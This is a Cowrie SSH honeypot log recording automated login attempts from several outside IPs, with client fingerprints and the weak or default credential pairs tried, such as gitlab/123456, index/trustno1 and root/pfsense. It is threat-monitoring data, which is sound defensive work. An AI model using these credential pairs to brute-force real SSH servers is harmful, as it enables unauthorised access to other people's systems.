{"eventid":"cowrie.session.closed","duration":"33.4","message":"Connection lost after 33.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:14:53.551440Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-28T09:14:54.812176Z","src_ip":"51.79.164.132","session":"9b7519188d30"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:14:56.325521Z","src_ip":"51.79.164.132","session":"9b7519188d30"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":41414,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b5a6f9ce5b5","protocol":"ssh","message":"New connection: 185.93.89.7:41414 (1.2.3.4:22) [session: 6b5a6f9ce5b5]","sensor":"my-vps","timestamp":"2025-08-28T09:15:11.876198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:15:11.899213Z","src_ip":"185.93.89.7","session":"6b5a6f9ce5b5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:15:11.900024Z","src_ip":"185.93.89.7","session":"6b5a6f9ce5b5"}
{"eventid":"cowrie.login.failed","username":"index","password":"trustno1","message":"login attempt [index/trustno1] failed","sensor":"my-vps","timestamp":"2025-08-28T09:15:12.014342Z","src_ip":"185.93.89.7","session":"6b5a6f9ce5b5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:15:13.035498Z","src_ip":"185.93.89.7","session":"6b5a6f9ce5b5"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":59650,"dst_ip":"1.2.3.4","dst_port":22,"session":"ece627e88c6a","protocol":"ssh","message":"New connection: 51.79.164.132:59650 (1.2.3.4:22) [session: ece627e88c6a]","sensor":"my-vps","timestamp":"2025-08-28T09:15:19.905108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:15:20.311579Z","src_ip":"51.79.164.132","session":"ece627e88c6a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:15:20.313282Z","src_ip":"51.79.164.132","session":"ece627e88c6a"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"123456","message":"login attempt [gitlab/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:15:24.689915Z","src_ip":"51.79.164.132","session":"ece627e88c6a"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:15:26.792952Z","src_ip":"51.79.164.132","session":"ece627e88c6a"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":57808,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f25da467a78","protocol":"ssh","message":"New connection: 185.93.89.7:57808 (1.2.3.4:22) [session: 5f25da467a78]","sensor":"my-vps","timestamp":"2025-08-28T09:15:42.753354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:15:42.776807Z","src_ip":"185.93.89.7","session":"5f25da467a78"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:15:42.777559Z","src_ip":"185.93.89.7","session":"5f25da467a78"}
{"eventid":"cowrie.login.failed","username":"index","password":"welcome","message":"login attempt [index/welcome] failed","sensor":"my-vps","timestamp":"2025-08-28T09:15:42.865705Z","src_ip":"185.93.89.7","session":"5f25da467a78"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:15:43.971797Z","src_ip":"185.93.89.7","session":"5f25da467a78"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":52192,"dst_ip":"1.2.3.4","dst_port":22,"session":"42ff64d24bf6","protocol":"ssh","message":"New connection: 51.79.164.132:52192 (1.2.3.4:22) [session: 42ff64d24bf6]","sensor":"my-vps","timestamp":"2025-08-28T09:15:46.407181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:15:46.713464Z","src_ip":"51.79.164.132","session":"42ff64d24bf6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:15:46.714152Z","src_ip":"51.79.164.132","session":"42ff64d24bf6"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-28T09:15:51.096767Z","src_ip":"51.79.164.132","session":"42ff64d24bf6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39900,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa9ec6a1b49e","protocol":"ssh","message":"New connection: 212.227.125.160:39900 (1.2.3.4:22) [session: aa9ec6a1b49e]","sensor":"my-vps","timestamp":"2025-08-28T09:15:51.960496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:15:52.021426Z","src_ip":"212.227.125.160","session":"aa9ec6a1b49e"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:15:52.023376Z","src_ip":"212.227.125.160","session":"aa9ec6a1b49e"}
{"eventid":"cowrie.login.success","username":"root","password":"pfsense","message":"login attempt [root/pfsense] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:15:52.275240Z","src_ip":"212.227.125.160","session":"aa9ec6a1b49e"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:15:52.332838Z","src_ip":"212.227.125.160","session":"aa9ec6a1b49e"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:15:53.246828Z","src_ip":"51.79.164.132","session":"42ff64d24bf6"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":42006,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ac24e8864b3","protocol":"ssh","message":"New connection: 185.93.89.7:42006 (1.2.3.4:22) [session: 7ac24e8864b3]","sensor":"my-vps","timestamp":"2025-08-28T09:16:06.907710Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:16:06.916678Z","src_ip":"185.93.89.7","session":"7ac24e8864b3"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:16:06.933057Z","src_ip":"185.93.89.7","session":"7ac24e8864b3"}
{"eventid":"cowrie.login.failed","username":"index","password":"aaaaaa","message":"login attempt [index/aaaaaa] failed","sensor":"my-vps","timestamp":"2025-08-28T09:16:07.000231Z","src_ip":"185.93.89.7","session":"7ac24e8864b3"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:16:08.021563Z","src_ip":"185.93.89.7","session":"7ac24e8864b3"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":39994,"dst_ip":"1.2.3.4","dst_port":22,"session":"f13561b87948","protocol":"ssh","message":"New connection: 51.79.164.132:39994 (1.2.3.4:22) [session: f13561b87948]","sensor":"my-vps","timestamp":"2025-08-28T09:16:12.971045Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:16:13.876807Z","src_ip":"51.79.164.132","session":"f13561b87948"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:16:13.877492Z","src_ip":"51.79.164.132","session":"f13561b87948"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-28T09:16:19.063254Z","src_ip":"51.79.164.132","session":"f13561b87948"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:16:21.421566Z","src_ip":"51.79.164.132","session":"f13561b87948"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":41474,"dst_ip":"1.2.3.4","dst_port":22,"session":"3477a4ef1dfa","protocol":"ssh","message":"New connection: 185.93.89.7:41474 (1.2.3.4:22) [session: 3477a4ef1dfa]","sensor":"my-vps","timestamp":"2025-08-28T09:16:32.479861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:16:32.496439Z","src_ip":"185.93.89.7","session":"3477a4ef1dfa"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:16:32.547726Z","src_ip":"185.93.89.7","session":"3477a4ef1dfa"}
{"eventid":"cowrie.login.failed","username":"index","password":"123qwe","message":"login attempt [index/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-28T09:16:32.691559Z","src_ip":"185.93.89.7","session":"3477a4ef1dfa"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:16:33.837245Z","src_ip":"185.93.89.7","session":"3477a4ef1dfa"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":52024,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc8383b1bbd2","protocol":"ssh","message":"New connection: 51.79.164.132:52024 (1.2.3.4:22) [session: bc8383b1bbd2]","sensor":"my-vps","timestamp":"2025-08-28T09:16:40.129338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:16:40.257708Z","src_ip":"51.79.164.132","session":"bc8383b1bbd2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:16:40.872345Z","src_ip":"51.79.164.132","session":"bc8383b1bbd2"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask","message":"login attempt [flask/flask] failed","sensor":"my-vps","timestamp":"2025-08-28T09:16:42.064228Z","src_ip":"51.79.164.132","session":"bc8383b1bbd2"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:16:43.797559Z","src_ip":"51.79.164.132","session":"bc8383b1bbd2"}
